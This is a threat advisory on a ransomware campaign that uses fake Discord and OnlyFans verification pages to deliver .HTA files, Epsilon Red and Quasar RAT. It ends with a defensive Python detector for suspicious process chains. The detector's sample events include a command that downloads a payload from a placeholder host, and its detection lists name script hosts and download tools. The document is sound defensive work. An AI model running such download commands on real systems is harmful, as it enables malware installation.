OnlyFans, Discord Click Fix-Themed Pages Distribute Epsilon Red Ransomware
Summary:
A large-scale ransomware campaign, active since early July 2025, has been targeting users worldwide by impersonating popular platforms such as Discord, Twitch, OnlyFans, and other social media services. The attackers use fake ClickFix-themed verification pages, styled to resemble official platform interfaces, to trick users into downloading malicious .HTA (HTML Application) files. These files abuse ActiveX controls to run scripts that deploy the Epsilon Red ransomware.
Upon execution, the ransomware encrypts critical files on the victim's system, appending unique extensions, and drops a ransom note written in a style comparable to the notorious REvil ransomware, although it runs as its own, separate operation. The campaign also delivers Quasar RAT (Remote Access Trojan), which gives the attackers persistent remote access to compromised systems for eavesdropping or further exploitation.
The deception is reinforced by social engineering, including romance-themed lures that exploit emotional trust, particularly among younger users. The campaign's infrastructure relies on a network of look-alike domains, such as ones mimicking Discord's Captcha Bot, to appear credible and avoid notice.
Analyst Comments:
The campaign trades on the reputation capital of established brands like OnlyFans and Discord to exploit users' trust. By relying on ActiveX, an outdated technology that still persists on some unpatched or misconfigured systems, the attackers are leveraging a long-standing weakness that should have been eliminated years ago.
Notably, the deliberate typo "Verificatification" on the spoofed verification pages appears intended to make them look less polished and therefore less suspicious to casual visitors. The global scale of the campaign and its use of reusable, themed delivery pages suggest a well-financed, sophisticated, long-term operation.
The use of Quasar RAT alongside ransomware indicates a two-stage approach, perhaps combining financial extortion with data theft or system reconnaissance. The pairing increases the value of each intrusion, since attackers can steal sensitive data before it is encrypted, or retain access for follow-up attacks.
This also highlights the need to deprecate legacy components like ActiveX and Windows Script Host. Any platform, no matter how popular or widely used, can be abused if security best practices are not followed. Organizations and individuals remain exposed until browsers are properly hardened, legacy systems are retired, and users are trained to recognize phishing and social engineering attacks.
Suggested Corrections:
To defend against this campaign and similar attacks, organizations and individuals should adopt a multi-layered defense strategy:
Disable Legacy Technologies: Disable ActiveX controls and Windows Script Host (WSH) immediately through Group Policy or equivalent system settings to block malicious scripts delivered via .HTA files or ActiveXObject calls.
Implement Threat Intelligence: Use threat feeds to proactively block known malicious IPs, domains, and Indicators of Future Attack (IOFAs) associated with ClickFix-themed campaigns. Solutions like CloudSEK XVigil Malware Logs can be employed to identify and block such threats in real time.
Enhance Endpoint Security: Deploy Endpoint Detection and Response (EDR) tooling with rules that detect unusual activity, such as hidden script execution (e.g., shell.Run, cmd /c), silent downloads via tools like curl, or processes spawned by browsers. Keep EDR signatures updated to stay ahead of evolving ransomware strains.
User Awareness Training: Conduct regular security awareness training focused on recognizing social engineering methods, particularly those masquerading as platforms like Discord, Twitch, or OnlyFans. Run simulated phishing exercises using romance lures or mock verification requests to build user resilience.
Browser and File Hardening: Configure systems to deny execution of high-risk file types like .HTA, .js, .jse, and .vbs by associating them with a text editor (e.g., notepad.exe) instead of their default handlers. Enforce strong browser policies to prevent unvalidated scripts from running and to restrict plugin use.
Network Monitoring and Filtering: Implement robust network monitoring to detect and block connections to known malicious URLs or IPs. Employ web proxies and DNS filtering to block access to spoofed sites that clone legitimate services.
Patch Management: Keep all systems, especially those running legacy applications, fully patched to close known vulnerabilities exploitable through ActiveX or similar technologies. Audit systems regularly for out-of-date components.
Incident Response Planning: Develop and test an incident response plan tailored to ransomware attacks, including backups, system isolation processes, and communication plans to minimize downtime and data loss.
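As an added illustration of the EDR rules suggested under "Enhance Endpoint Security" (example code written for this advisory, not taken from the page or any vendor product), the following Python flags process-creation events in which a browser launches a script host such as mshta.exe, or a script host spawns cmd/curl with a silent-download command line. The event fields, process-name lists, and sample events are assumptions constructed for the demo; the URL is a placeholder.

```python
import re
from dataclasses import dataclass

# Assumed process names drawn from the advisory's guidance: script hosts that
# run .HTA/.js/.vbs files, browsers that download them, and tools they spawn.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SPAWNED_TOOLS = {"cmd.exe", "powershell.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}
# Command-line fragments the advisory calls out: "cmd /c", curl writing to disk, hidden windows.
SUSPICIOUS_ARGS = re.compile(r"cmd(\.exe)?\s+/c|curl(\.exe)?\b.*\s-o\b|-w(indowstyle)?\s+hidden", re.I)

@dataclass
class ProcEvent:            # minimal Sysmon/EDR-style process-creation record (assumed shape)
    parent_image: str       # full path of the parent process
    image: str              # full path of the new process
    command_line: str

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event is suspicious (empty list if benign)."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    reasons = []
    if parent in BROWSERS and child in SCRIPT_HOSTS:
        reasons.append(f"browser {parent} launched script host {child}")
    if parent in SCRIPT_HOSTS and child in SPAWNED_TOOLS:
        reasons.append(f"script host {parent} spawned {child}")
    if child in SCRIPT_HOSTS | SPAWNED_TOOLS and SUSPICIOUS_ARGS.search(ev.command_line):
        reasons.append("suspicious command line: " + ev.command_line[:60])
    return reasons

def detect(events):
    """Return [(index, reasons)] for every event that matched at least one rule."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]

# Constructed sample events (not real telemetry); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              r"C:\Windows\System32\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" C:\Users\alice\Downloads\verify.hta'),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /c curl -s http://example.invalid/payload -o %TEMP%\svc.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'),
]

if __name__ == "__main__":
    for idx, why in detect(SAMPLE_EVENTS):
        print(idx, "; ".join(why))
```

The benign explorer.exe to notepad.exe event is included so the rules can be checked for false positives alongside the two malicious chains.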
Link(s):
https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware